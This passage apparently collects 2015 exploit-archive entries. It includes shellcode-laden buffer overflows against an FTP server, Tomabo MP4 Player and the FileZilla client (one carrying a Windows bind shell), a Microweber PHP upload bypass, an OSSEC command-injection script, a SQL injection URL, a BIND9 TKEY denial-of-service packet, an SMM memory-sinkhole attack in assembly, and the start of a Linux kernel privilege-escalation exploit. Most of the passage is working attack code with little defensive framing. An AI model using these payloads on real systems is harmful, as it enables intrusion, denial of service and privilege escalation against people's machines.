"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
buffer = "\x90" * 30 + shellcode
#77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll]
evil = "A"*2008 + "\x59\x54\xC3\x77" + buffer + "C"*(888-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((raw_input('Enter Host:'),21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('PUT ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed
under Apache License, Version 2.0 which allows you to create your own website,
blog or online shop.
Desc: Microweber suffers from an authenticated arbitrary command execution
vulnerability. The issue is caused due to the improper verification when
uploading files in '/src/Microweber/functions/plupload.php' script. This
can be exploited to execute arbitrary PHP code by bypassing the extension
restriction by putting the dot character at the end of the filename and uploading
a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded'
directory.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5250
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
12.07.2015
--
PoC Requests:
-------------
1.
POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 319
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193
Accept: */*
Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="name"
phpinfo.php.
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="file"; filename="phpinfo.php."
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryqX83MP6Cg5JpA193--
2.
GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow
# Date: 03/08/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://tomabo.com/mp4-player/index.html
# Version: 3.11.3
# Tested on: Windows XP SP3
#---------------------------------------------------------------------#
# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
#
# nc 192.168.11.136 8080
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#---------------------------------------------------------------------#
import sys, struct
file="crash.m3u"
# Windows bind shell port 8080, feel free to swap shellcode
sc = ""
sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
sc += "\x6c\x19\xa9\x11"
payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc
writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()
# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit
# Date: 02/08/2015
# Exploit Author: ly0n
# Vendor Homepage: filezilla-project.org/
# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90
# Version: tested on filezilla 2.2.21
# Tested on: Windows XP sp3 english
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
# visit: ly0n.me
# greetz: NBS
#MSGBOX "BrokenByte"
msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74"
"\x69\x30\x68\x5e\x58\x65\x63\x89"
"\xe3\x68\x20\x20\x20\x00\x68\x68"
"\x65\x72\x65\x68\x77\x61\x73\x20"
"\x68\x6e\x33\x72\x20\x68\x75\x74"
"\x69\x30\x68\x5e\x58\x65\x63\x89"
"\xe1\x31\xc0\x50\x53\x51\x50\x50"
"\xbe\xea\x07\x45\x7e\xff\xe6\x31"
"\xc0\x50\xb8\x12\xcb\x81\x7c\xff"
"\xe0")
nops = "\x90" * 100
#77EA9CAC POP POP RET kernel32.dll <- seh
#EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh
nseh = "\xeb\x06\x90\x90"
seh = "\xAC\x9C\xEA\x77"
allow_delete = False
local_ip = "192.168.11.6" #SERVER LOCAL IP
local_port = 21 #DESIRED PORT
buffer1 = "\x41" * 1896 + nseh + seh + nops + msgbox + nops
buffer = buffer1 + ".txt"
currdir=os.path.abspath('.')
class FTPserverThread(threading.Thread):
def __init__(self,(conn,addr)):
self.conn=conn
self.addr=addr
self.basewd=currdir
self.cwd=self.basewd
self.rest=False
self.pasv_mode=False
threading.Thread.__init__(self)
def run(self):
self.conn.send('220 Welcome!\r\n')
while True:
cmd=self.conn.recv(256)
if not cmd: break
else:
print 'Recieved:',cmd
try:
func=getattr(self,cmd[:4].strip().upper())
func(cmd)
except Exception,e:
print 'ERROR:',e
#traceback.print_exc()
self.conn.send('500 Sorry.\r\n')
def SYST(self,cmd):
self.conn.send('215 UNIX Type: L8\r\n')
def OPTS(self,cmd):
if cmd[5:-2].upper()=='UTF8 ON':
self.conn.send('200 OK.\r\n')
else:
self.conn.send('451 Sorry.\r\n')
def USER(self,cmd):
self.conn.send('331 OK.\r\n')
def PASS(self,cmd):
self.conn.send('230 OK.\r\n')
#self.conn.send('530 Incorrect.\r\n')
def QUIT(self,cmd):
self.conn.send('221 Goodbye.\r\n')
def NOOP(self,cmd):
self.conn.send('200 OK.\r\n')
def TYPE(self,cmd):
self.mode=cmd[5]
self.conn.send('200 Binary mode.\r\n')
def CDUP(self,cmd):
if not os.path.samefile(self.cwd,self.basewd):
#learn from stackoverflow
self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
self.conn.send('200 OK.\r\n')
def PWD(self,cmd):
cwd=os.path.relpath(self.cwd,self.basewd)
if cwd=='.':
cwd='/'
else:
cwd='/'+cwd
self.conn.send('257 \"%s\"\r\n' % cwd)
def CWD(self,cmd):
chwd=cmd[4:-2]
if chwd=='/':
self.cwd=self.basewd
elif chwd[0]=='/':
self.cwd=os.path.join(self.basewd,chwd[1:])
else:
self.cwd=os.path.join(self.cwd,chwd)
self.conn.send('250 OK.\r\n')
def PORT(self,cmd):
if self.pasv_mode:
self.servsock.close()
self.pasv_mode = False
l=cmd[5:].split(',')
self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.\r\n')
def PASV(self,cmd): # from http://goo.gl/3if2U
self.pasv_mode = True
self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.servsock.bind((local_ip,0))
self.servsock.listen(1)
ip, port = self.servsock.getsockname()
print 'open', ip, port
self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
def start_datasock(self):
if self.pasv_mode:
self.datasock, addr = self.servsock.accept()
print 'connect:', addr
else:
self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.datasock.connect((self.dataAddr,self.dataPort))
def stop_datasock(self):
self.datasock.close()
if self.pasv_mode:
self.servsock.close()
def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.\r\n')
print 'list:', self.cwd
self.start_datasock()
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"\r\n\n"
dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" \r\n\n"
self.datasock.send("total 2\r\n"+dirlist)
self.stop_datasock()
self.conn.send('226 Directory send OK.\r\n')
def toListItem(self,fn):
st=os.stat(fn)
fullmode='rwxrwxrwx'
mode=''
for i in range(9):
mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
d=(os.path.isdir(fn)) and 'd' or '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
def MKD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
os.mkdir(dn)
self.conn.send('257 Directory created.\r\n')
def RMD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
if allow_delete:
os.rmdir(dn)
self.conn.send('250 Directory deleted.\r\n')
else:
self.conn.send('450 Not allowed.\r\n')
def DELE(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
if allow_delete:
os.remove(fn)
self.conn.send('250 File deleted.\r\n')
else:
self.conn.send('450 Not allowed.\r\n')
def RNFR(self,cmd):
self.rnfn=os.path.join(self.cwd,cmd[5:-2])
self.conn.send('350 Ready.\r\n')
def RNTO(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
os.rename(self.rnfn,fn)
self.conn.send('250 File renamed.\r\n')
def REST(self,cmd):
self.pos=int(cmd[5:-2])
self.rest=True
self.conn.send('250 File position reseted.\r\n')
def RETR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
#fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
print 'Downlowding:',fn
if self.mode=='I':
fi=open(fn,'rb')
else:
fi=open(fn,'r')
self.conn.send('150 Opening data connection.\r\n')
if self.rest:
fi.seek(self.pos)
self.rest=False
data= fi.read(1024)
self.start_datasock()
while data:
self.datasock.send(data)
data=fi.read(1024)
fi.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
def STOR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
print 'Uplaoding:',fn
if self.mode=='I':
fo=open(fn,'wb')
else:
fo=open(fn,'w')
self.conn.send('150 Opening data connection.\r\n')
self.start_datasock()
while True:
data=self.datasock.recv(1024)
if not data: break
fo.write(data)
fo.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
class FTPserver(threading.Thread):
def __init__(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((local_ip,local_port))
threading.Thread.__init__(self)
def run(self):
self.sock.listen(5)
while True:
th=FTPserverThread(self.sock.accept())
th.daemon=True
th.start()
def stop(self):
self.sock.close()
if __name__=='__main__':
ftp=FTPserver()
ftp.daemon=True
ftp.start()
print 'On', local_ip, ':', local_port
raw_input('Enter to end...\n')
ftp.stop()
###########################################################
# Exploit Title: [OSSEC]
# Date: [2015-08-01]
# Exploit Author: [Milad Saber]
# Vendor Homepage: [www.ossec.net]
# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
# Version: [0.8]
# Tested on: [OSSEC Manager]
# Exploit for DOS ossec server.
# Please install ossec server and WUI 0.8 and run this exploit
##########################################################
import socket
import sys
import time
# specify payload
payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
user = 'root'
pwd = 'var'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to milad exploit ..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25,80))
s.send("hello milad@milad.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@milad.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: milad@milad.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS
Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23
Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23
#!/usr/bin/env python
# Title : Python IDLE 2.7.8 - Crash Proof Of Concept
# Website : http://www.python.org/idle/
# Tested : Windows 7 / Windows 8.1
#
#
# Author : Hadi Zomorodi Monavar
# Email : zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "python 2.7.8 IDLE"
# 4 . from Menu (edit --> find)
# 5 . Paste ClipBoard on "find"
# 6 . Enter
# 7 . Crashed ;)
crash = "\x41"*900000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()
#------------------------------------------------------------------------------------------#
# Exploit Title: Froxlor Server Management Panel - MySQL Login Information Disclosure #
# Date: Jul 30 2015 #
# Exploit Author: Dustin Dörr #
# Vendor Homepage: https://www.froxlor.org/ #
# Version: <= 0.9.33.1 #
#------------------------------------------------------------------------------------------#
An unauthenticated remote attacker is able to get the Froxlor MySQL password and username
via webaccess due to wrong file permissions of the /logs/ folder in Froxlor version
0.9.33.1 and earlier. The plain MySQL password and username may be stored in the
/logs/sql-error.log file. This directory is publicly reachable by default.
some default URLs are:
- http://example.com/froxlor/logs/sql-error.log
- http://cp.example.com/logs/sql-error.log
- http://froxlor.example.com/logs/sql-error.log
the certain section looks like this:
/var/www/froxlor/lib/classes/database/class.Database.php(279):
PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'DATABASE_PASSWORD', Array)
please note that the password in the logfile is truncated to 15 chars,
therefore passwords longer than 15 chars are not fully visible to an attacker.
; memory sinkhole proof of concept
; hijack ring -2 execution through the apic overlay attack.
; deployed in ring 0
; the SMBASE register of the core under attack
TARGET_SMBASE equ 0x1f5ef800
; the location of the attack GDT.
; this is determined by which register will be read out of the APIC
; for the GDT base. the APIC registers at this range are hardwired,
; and outside of our control; the SMM code will generally be reading
; from APIC registers in the 0xb00 range if the SMM handler is page
; aligned, or the 0x300 range if the SMM handler is not page aligned.
; the register will be 0 if the SMM handler is aligned to a page
; boundary, or 0x10000 if it is not.
GDT_ADDRESS equ 0x10000
; the value added to SMBASE by the SMM handler to compute the
; protected mode far jump offset. we could eliminate the need for an
; exact value with a nop sled in the hook.
FJMP_OFFSET equ 0x8097
; the offset of the SMM DSC structure from which the handler loads
; critical information
DSC_OFFSET equ 0xfb00
; the descriptor value used in the SMM handler’s far jump
DESCRIPTOR_ADDRESS equ 0x10
; MSR number for the APIC location
APIC_BASE_MSR equ 0x1b
; the target memory address to sinkhole
SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
; we will hijack the default SMM handler and point it to a payload
; at this physical address.
PAYLOAD_OFFSET equ 0x1000
; compute the desired base address of the CS descriptor in the GDT.
; this is calculated so that the fjmp performed in SMM is perfectly
; redirected to the payload hook at PAYLOAD_OFFSET.
CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
; we target the boot strap processor for hijacking.
APIC_BSP equ 0x100
; the APIC must be activated for the attack to work.
APIC_ACTIVE equ 0x800
;;; begin attack ;;;
; clear the processor caches,
; to prevent bypassing the memory sinkhole on data fetches
wbinvd
; construct a hijack GDT in memory under our control
; note: assume writing to identity mapped memory.
; if non-identity mapped, translate these through the page tables first.
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
(CS_BASE&0xff000000) | (0x00cf9a00) |
(CS_BASE&0x00ff0000)>>16
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
(CS_BASE&0x0000ffff)<<16 | 0xffff
; remap the APIC to sinkhole SMM’s DSC structure
mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
mov edx, 0
mov ecx, APIC_BASE_MSR
wrmsr
; wait for a periodic SMI to be triggered
jmp $
#!/usr/bin/env python
# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')
/*
> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp. A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*
And here's a real advisory:
If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt. This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.
Glossing over a lot of details, the basic structure of Linux' nested NMI
handling is:
nmi_handler:
if (in_nmi) {
nmi_latched = true;
return;
}
in_nmi = true;
handle the nmi;
atomically (this is magic):
if (nmi_latched) {
nmi_latched = false;
start over;
} else {
in_nmi = false;
return and unmask NMIs;
}
Alas, on x86_64, there is no reasonable way to block NMIs to run the
atomic part of that pseudocode atomically. Instead, the entire atomic
piece is implemented by the single instruction IRET.
But x86_64 is more broken than just that. The IRET instruction does not
restore register state correctly [1] when returning to a 16-bit stack
segment. x86_64 has a complicated workaround called espfix64. If
espfix64 is invoked on return, a well-behaved IRET is emulated by a
complicated scheme that involves manually switching stacks. During the
stack switch, there is a window of approximately 19 instructions between
the start of espfix64's access to the original stack and when espfix64
is done with the original stack. If a nested NMI occurs during this
window, then the atomic part of the basic nested NMI algorithm is
observably non-atomic.
Depending on exactly where in this window the nested NMI hits, the
results vary. Most nested NMIs will corrupt the return context and
crash the calling process. Some are harmless except that the nested NMI
gets ignored. There is a two-instruction window in which the return
context ends up with user-controlled RIP and CS set to __KERNEL_CS.
A careful exploit (attached) can recover from all the crashy failures
and can regenerate a valid *privileged* state if a nested NMI occurs
during the two-instruction window. This exploit appears to work
reasonably quickly across a fairly wide range of Linux versions.
If you have SMEP, this exploit is likely to panic the system. Writing
a usable exploit against a SMEP system would be considerably more
challenging, but it's surely possible.
Measures like UDEREF are unlikely to help, because this bug is outside
any region that can be protected using paging or segmentation tricks.
However, recent grsecurity kernels seem to forcibly disable espfix64, so
they're not vulnerable in the first place.
A couple of notes:
- This exploit's payload just prints the text "CPL0". The exploit
will keep going after printing CPL0 so you can enjoy seeing the
frequency with which it wins. Interested parties could easily
write different payloads. I doubt that any existing exploit
mitigation techniques would be useful against this type of
attack.
- If you are using a kernel older than v4.1, a 64-bit build of the
exploit will trigger a signal handling bug and crash. Defenders
should not rejoice, because the exploit works fine when build
as a 32-bit binary or (so I'm told) as an x32 binary.
- This is the first exploit I've ever written that contains genuine
hexadecimal code. The more assembly-minded among you can have
fun figuring out why :)
[1] By "correctly", I mean that the register state ends up different
from that which was saved in the stack frame, not that the
implementation doesn't match the spec in the microcode author's minds.
The spec is simply broken (differently on AMD and Intel hardware,
perhaps unsurprisingly.)
--Andy
*/
/*
* Copyright (c) 2015 Andrew Lutomirski.
* GPL v2
*
* Build with -O2. Don't use -fno-omit-frame-pointer.
*
* Thanks to Petr Matousek for pointing out a bug in the exploit.
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>
#include <asm/ldt.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/processor-flags.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <err.h>
/* Abstractions for some 32-bit vs 64-bit differences. */
#ifdef __x86_64__
# define REG_IP REG_RIP
# define REG_SP REG_RSP
# define REG_AX REG_RAX
struct selectors {
unsigned short cs, gs, fs, ss;
};
static unsigned short *ssptr(ucontext_t *ctx)
{
struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
return &sels->ss;
}
static unsigned short *csptr(ucontext_t *ctx)
{
struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
return &sels->cs;
}
#else
# define REG_IP REG_EIP
# define REG_SP REG_ESP
# define REG_AX REG_EAX
# define REG_CR2 (REG_SS + 3)
static greg_t *ssptr(ucontext_t *ctx)
{
return &ctx->uc_mcontext.gregs[REG_SS];
}
static greg_t *csptr(ucontext_t *ctx)
{
return &ctx->uc_mcontext.gregs[REG_CS];
}
#endif
static char altstack_data[SIGSTKSZ];
static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *),
int flags)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = handler;
sa.sa_flags = SA_SIGINFO | flags;
sigemptyset(&sa.sa_mask);
if (sigaction(sig, &sa, 0))
err(1, "sigaction");
}
static jmp_buf jmpbuf;
static volatile unsigned long expected_rsp;
static volatile unsigned int cpl0;
static void handler(int sig, siginfo_t *info, void *ctx_void)
{
ucontext_t *ctx = (ucontext_t*)ctx_void;
unsigned long sig_err = ctx->uc_mcontext.gregs[REG_ERR];
unsigned long sig_trapno = ctx->uc_mcontext.gregs[REG_TRAPNO];
char errdesc[64] = "";
if (sig_trapno == 14) {
strcpy(errdesc, " ");
if (sig_err & (1 << 0))
strcat(errdesc, "PRESENT ");
if (sig_err & (1 << 1))
strcat(errdesc, "WRITE ");
if (sig_err & (1 << 2))
strcat(errdesc, "USER ");
sprintf(errdesc + strlen(errdesc), "at 0x%llX",
(unsigned long long)ctx->uc_mcontext.gregs[REG_CR2]);
} else if (sig_err != 0) {
const char *src = (sig_err & 1) ? " EXT" : "";
const char *table;
if ((sig_err & 0x6) == 0x0)
table = "GDT";
else if ((sig_err & 0x6) == 0x4)
table = "LDT";
else if ((sig_err & 0x6) == 0x2)
table = "IDT";
else
table = "???";
sprintf(errdesc, " %s%s index %lu, ",
table, src, sig_err >> 3);
}
char trapname[32];
if (sig_trapno == 13)
strcpy(trapname, "GP");
else if (sig_trapno == 11)
strcpy(trapname, "NP");
else if (sig_trapno == 12)
